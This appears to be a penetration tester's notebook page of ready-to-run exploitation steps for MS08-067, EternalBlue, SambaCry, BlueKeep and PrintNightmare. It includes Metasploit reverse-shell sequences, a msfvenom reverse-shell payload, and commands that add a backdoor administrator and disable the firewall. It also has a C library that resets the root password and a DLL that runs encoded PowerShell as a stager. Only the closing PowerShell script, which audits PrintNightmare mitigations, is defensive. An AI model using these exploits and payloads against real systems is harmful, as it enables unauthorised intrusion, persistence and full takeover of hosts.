Pentester's Promiscuous Notebook
Low-Hanging Fruits
net_api
CVE-2008-4250, MS08-067
Check:
$ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445
Or
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > check
Exploit:
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
EternalBlue
CVE-2017-0144, MS17-010
MSF
Check:
$ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445
Or
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS file:smb.txt
msf > set THREADS 25
msf > run
Exploit with:
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
EternalRomance / EternalSynergy / EternalChampion
Exploit with ms17_010_psexec:
msf > use exploit/windows/smb/ms17_010_psexec
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
Exploit with ms17_010_command:
msf > use auxiliary/admin/smb/ms17_010_command
msf > set RHOSTS file:smb.txt
msf > set COMMAND "net user snovvcrash Passw0rd! /add && net localgroup administrators snovvcrash /add"
msf > run
Manually
https://github.com/helviojunior/MS17-010
https://0xdf.gitlab.io/2019/02/21/htb-legacy.html#ms-17-010
Send MSF payload and execute it with send_and_execute.py:
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
$ python send_and_execute.py 10.10.13.38 rev.exe
Or just execute commands on host via zzz_exploit.py (at least one named pipe must be accessible on target):
$ python zzz_exploit.py
zzz_exploit.py

```python
...
def smb_pwn(conn, arch):
    service_exec(conn, r'cmd /c net user snovvcrash Passw0rd! /add')
    service_exec(conn, r'cmd /c net localgroup administrators snovvcrash /add')
    service_exec(conn, r'cmd /c netsh firewall set opmode disable')
...
```
For x86 EternalBlue shellcodes use AutoBlue-MS17-010.
FuzzBunch (Wine)
https://github.com/fuzzbunch/fuzzbunch
https://0x00sec.org/t/porting-the-leaked-equation-group-eqgrp-fuzzbunch-tool-to-linux/1956
https://habr.com/ru/post/327490/
SambaCry
CVE-2017-7494
(Samba 3.5.0 < 4.4.14/4.5.10/4.6.4)
MSF
msf > use exploit/linux/samba/is_known_pipename
msf > set SMB::AlwaysEncrypt false
msf > set SMB::ProtocolVersion 1
msf > run
Manually
https://github.com/opsxcq/exploit-CVE-2017-7494
https://github.com/joxeankoret/CVE-2017-7494
Compile .so SUID shared library:
pwn.c

```c
// gcc -shared -fPIC -o pwn.so pwn.c
#define _GNU_SOURCE       // setresuid() is a GNU extension, declared in <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Constructor attribute: runs as soon as the library is loaded by the process
static void pwn() __attribute__((constructor));

void pwn() {
    setresuid(0, 0, 0);
    system("echo 'root:Passw0rd!'|chpasswd");
}
```
Get real share path on the target's filesystem:
$ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37
path: /home/snovvcrash/sharename
Upload pwn.so to target and then run the exploit:
$ pip install virtualenv
$ virtualenv -p /usr/bin/python2.7 venv
$ . venv/bin/activate
$ pip install -r requirements.txt
$ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p ''
BlueKeep
CVE-2019-0708
Check:
msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf > set RHOSTS file:rdp.txt
msf > set THREADS 25
msf > run
Exploit:
msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf > set RHOSTS file:rdp.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
PrintNightmare
CVE-2021-1675, CVE-2021-34527
https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
https://pentestlab.blog/2021/08/17/domain-escalation-printnightmare/
Check
CrackMapExec
https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/modules/spooler.py
$ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M spooler
ItWasAllADream
https://github.com/byt3bl33d3r/ItWasAllADream
$ poetry run itwasalladream -d megacorp.local -u snovvcrash -p 'Passw0rd!' 192.168.1.0/24
Exploit
C/C++
RCE (fork of the original repo):
https://github.com/afwu/PrintNightmare
LPE:
https://github.com/hlldz/CVE-2021-1675-LPE
Python
RCE:
https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py
https://github.com/cube0x0/CVE-2021-1675/blob/main/SharpPrintNightmare/CVE-2021-1675.py
https://www.hackthebox.eu/blog/windows-protocols-python
Usage
1. Prepare an SMB share with anonymous authentication allowed (smbserver.py also works):
2. Generate an evil DLL: a C2 stager / add user to a privileged group (1, 2, 3, etc.) / invoke a custom command (see example below).
3. Run the exploit:
$ python CVE-2021-1675.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 '\\10.10.13.37\share\pwn.dll'
pwn.c

```c
// x86_64-w64-mingw32-gcc pwn.c -o pwn.dll -shared
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

// Default function that is executed when the DLL is loaded
void Entry() {
    system("powershell -enc <BASE64_PWSH_CODE>");
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            // Run the payload in its own thread so DllMain returns immediately
            CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Entry, 0, 0, 0);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}
```
Leveraging PrintNightmare to Abuse RBCD and DCSync the Domain
C#
RCE + LPE:
https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare
PowerShell
LPE:
https://github.com/calebstewart/CVE-2021-1675
Reproducibility
Flowchart by @wdormann:
Mitigation
https://github.com/LaresLLC/CVE-2021-1675
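The link above points to a mitigation script; the block below is an added example (not code from the notebook or from the LaresLLC repository) that audits the same hardening points on a local Windows host: whether the Spooler service is running, whether it accepts remote RPC connections, and whether the Point and Print policy values from Microsoft's KB5005010 guidance are set. Function names (Get-RegDword, Test-PrintNightmareMitigations) are this example's own; the registry paths and value names are Microsoft's.

```powershell
# Added example: audit PrintNightmare mitigations on the local host.
# Registry paths and value names follow Microsoft's KB5005010 guidance;
# function names are this example's own.

$PointAndPrint  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$PrintersPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'

function Get-RegDword {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or value is absent (OS default applies)
    try {
        (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name
    } catch {
        $null
    }
}

function Test-PrintNightmareMitigations {
    $findings = @()

    # 1. Spooler service state: on domain controllers and servers that never
    #    print, stopping and disabling it removes the attack surface entirely.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if ($null -ne $spooler -and $spooler.Status -eq 'Running') {
        $findings += "Spooler service is running (startup type: $($spooler.StartType))"
    }

    # 2. Remote RPC endpoint: RegisterSpoolerRemoteRpcEndPoint = 2 stops the
    #    spooler from accepting inbound client connections.
    $remoteRpc = Get-RegDword -Path $PrintersPolicy -Name 'RegisterSpoolerRemoteRpcEndPoint'
    if ($remoteRpc -ne 2) {
        $findings += 'Spooler remote RPC endpoint is not disabled (RegisterSpoolerRemoteRpcEndPoint != 2)'
    }

    # 3. Point and Print hardening: driver installation restricted to
    #    administrators, and the elevation/update prompts not suppressed.
    $restrict = Get-RegDword -Path $PointAndPrint -Name 'RestrictDriverInstallationToAdministrators'
    if ($restrict -ne 1) {
        $findings += 'RestrictDriverInstallationToAdministrators is not explicitly set to 1'
    }
    $noWarn = Get-RegDword -Path $PointAndPrint -Name 'NoWarningNoElevationOnInstall'
    if ($noWarn -eq 1) {
        $findings += 'NoWarningNoElevationOnInstall is 1 (elevation prompt suppressed)'
    }
    $update = Get-RegDword -Path $PointAndPrint -Name 'UpdatePromptSettings'
    if ($update -eq 1 -or $update -eq 2) {
        $findings += "UpdatePromptSettings is $update (driver update prompt suppressed)"
    }

    [pscustomobject]@{
        ComputerName = $env:COMPUTERNAME
        Hardened     = ($findings.Count -eq 0)
        Findings     = $findings
    }
}

Test-PrintNightmareMitigations | Format-List
```

Run it in an elevated PowerShell session; a host is reported as Hardened only when the spooler is stopped or remote-disabled and all three Point and Print values are in their restrictive state. Absent values are treated as unhardened on purpose, so that hosts relying on an OS default rather than an explicit policy still show up in the Findings list.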